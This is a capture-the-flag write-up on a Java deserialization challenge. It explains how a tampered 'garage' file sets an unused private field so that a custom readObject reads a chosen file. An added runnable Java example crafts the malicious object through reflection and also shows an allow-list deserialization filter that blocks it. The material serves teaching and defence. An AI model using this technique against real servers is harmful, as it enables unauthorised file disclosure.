By Yaakov Cohen
We noticed that the jar file contained both the client's and the server's code, so we could read the server side as well. When the client chooses "Save garage", the server serializes the garage object and sends the resulting byte array to the client.

The client then writes that byte array to a file called "garage".

When the client chooses "Load existing garage", the client reads the "garage" file and sends its contents to the server.

The server then deserializes that stream straight into a garage object, without performing any checks on the data it received.
In the garage class we can see a private field, private Employee garageManager;, that is never set anywhere in the code flow. In the garageManager class the readObject function has a custom implementation; this function is executed automatically when the object is deserialized:
If only we could create a garageManager and change its closeMessageFile attribute from
Wait a second, we can! The jar gives us the classes, and the server deserializes whatever "garage" file we send back.
So the plan is:
1. Modify the garage object: set its garageManager to a garageManager whose closeMessageFile attribute we choose.
2. Create a new garage object containing it and serialize it to the "garage" file.
3. Send it to the server with "Load existing garage", so the server deserializes our object and the custom readObject runs.
4. Get the new garage object back from the server with "Save garage".
In the object file we can see the flag.
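The following is an added example, not the challenge's own code, that reconstructs the whole chain in one runnable file: the two classes, the client-side tampering with the unused private field, the unchecked server-side deserialization, and the fix a practitioner would apply. The field names garageManager and closeMessageFile come from the write-up; the body of readObject (reading and printing the file named by closeMessageFile), the Employee and Garage class shapes, the class name GarageDeser and the flag file are assumptions made for the demo.

```java
import java.io.*;
import java.lang.reflect.Field;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;

// Assumed reconstruction of the challenge classes (names from the write-up,
// readObject body is a guess made for this demo).
class Employee implements Serializable {
    private static final long serialVersionUID = 1L;
    String closeMessageFile = "close_message.txt";

    // Custom readObject: the JVM calls this while deserializing an Employee,
    // before any application code gets to validate the object.
    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        in.defaultReadObject();
        System.out.println("close message: "
            + new String(Files.readAllBytes(Path.of(closeMessageFile)), StandardCharsets.UTF_8));
    }
}

class Garage implements Serializable {
    private static final long serialVersionUID = 1L;
    String name = "demo";
    private Employee garageManager;   // never assigned by the application itself
}

public class GarageDeser {
    // Server side, as described on the page: "Load existing garage" with no checks.
    static Garage loadGarageUnsafe(byte[] blob) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(blob))) {
            return (Garage) in.readObject();
        }
    }

    // Hardened variant: a deserialization filter (Java 9+) that allows only Garage.
    // Employee is rejected with InvalidClassException before its readObject can run.
    static Garage loadGarageFiltered(byte[] blob) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(blob))) {
            in.setObjectInputFilter(ObjectInputFilter.Config.createFilter("Garage;!*"));
            return (Garage) in.readObject();
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Client side: the jar ships the same classes, so we deserialize the saved
    // garage locally, fill the unused private field via reflection, and write
    // the result back as the "garage" file that "Load existing garage" sends.
    static byte[] craftMaliciousGarage(byte[] savedGarage, String targetFile) throws Exception {
        Garage g = loadGarageUnsafe(savedGarage);   // safe here: garageManager is still null
        Employee mgr = new Employee();
        mgr.closeMessageFile = targetFile;
        Field f = Garage.class.getDeclaredField("garageManager");
        f.setAccessible(true);
        f.set(g, mgr);
        return serialize(g);
    }

    public static void main(String[] args) throws Exception {
        // Constructed stand-in for the file the server holds; path is an assumption.
        Path flag = Files.createTempFile("flag", ".txt");
        Files.write(flag, "FLAG{constructed_demo}".getBytes(StandardCharsets.UTF_8));

        byte[] saved = serialize(new Garage());               // what "Save garage" returns
        byte[] evil = craftMaliciousGarage(saved, flag.toString());
        Files.write(Path.of("garage"), evil);                 // the file the client sends back

        loadGarageUnsafe(evil);        // Employee.readObject fires: prints the flag file
        try {
            loadGarageFiltered(evil);  // rejected: Employee is not on the allow-list
        } catch (InvalidClassException e) {
            System.out.println("filtered: " + e.getMessage());
        }
    }
}
```

Compile and run with `javac GarageDeser.java && java GarageDeser` (Java 11 or newer for Path.of). The filter string "Garage;!*" is an allow-list: anything not named in it, including the gadget class the attacker needs, is rejected during stream parsing rather than after the damage is done, which is the property the challenge server lacked.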